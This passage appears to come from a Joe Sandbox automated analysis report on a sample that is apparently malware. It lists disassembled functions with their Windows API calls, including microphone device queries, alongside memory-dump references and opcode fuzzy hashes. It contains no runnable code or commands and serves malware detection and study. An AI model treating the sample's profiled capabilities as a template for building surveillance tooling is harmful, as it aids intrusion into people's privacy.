                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3104255891-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                                                                                                                                          Function 004CFD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile$Version
                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                          • API String ID: 3849939888-4282027825
                                                                                                                                                                                                                                                                                                                          • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                                                                                                                                          Function 004FA670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,7734FFB0), ref: 004F9B35
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                          • String ID: FriendlyName
                                                                                                                                                                                                                                                                                                                          • API String ID: 904232820-3623505368
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                                                                                                                                          Function 004CAB90 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3137390749-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec125f8efd539a004f5243cd975522e641b23088832de904e1665531ca55df12
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2981AFB56043458FC324CF29D484A67FBF1BF98314F148A6ED58A87712D334E989CBA6
                                                                                                                                                                                                                                                                                                                          Function 0052AFD0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32 ref: 0052AFF0
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B016
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C25F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: Sleep.KERNEL32(00000000,?,?,0052B390,?,004012F9,00000008), ref: 0040C272
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0040C250: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0040C279
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 0052B050
                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0052B05B
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CounterExchangeInterlockedPerformanceQuery$Compare$Sleep
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 188302963-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 331ae7ec3883c6fb41667714d1c2397b805b788a0704fbfdebc2abdcd4384ec1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96cf593c803fdbd1df6e800226bb337d538f109cfd51101e6c499ec62b01222
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212A75604712ABC318DF65D884A9AF7E8BF89300F040A1DE85993780D734F918CBA2
                                                                                                                                                                                                                                                                                                                          Function 004E5C20 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4850: waveInGetNumDevs.WINMM(defaultmicrophone,00000000,?,00000000,?,?,?,?,004E8459,?,?,?,?,?,?,?), ref: 004E489B
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4C80: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C7E,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E4C8A
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E4C80: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E4CD7
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E3860: EnterCriticalSection.KERNEL32(?,00000000,?,004E5C91,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E3868
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E3860: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E388F
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E5B40: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,?,004E5C9B,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?), ref: 004E5B4C
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 004E5B40: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5B71
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000004,00000000,?,00000000,00000000,00000000,echosuppression,gain,00000000,00000000,?,?,004E8459), ref: 004E5CA2
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004E5CB2
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                                                                                                                                          • String ID: echosuppression$gain
                                                                                                                                                                                                                                                                                                                          • API String ID: 967401230-1829011300
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                                          • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                                                                                                                                          Function 00509EC0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,7734FFB0), ref: 00509F3D
                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
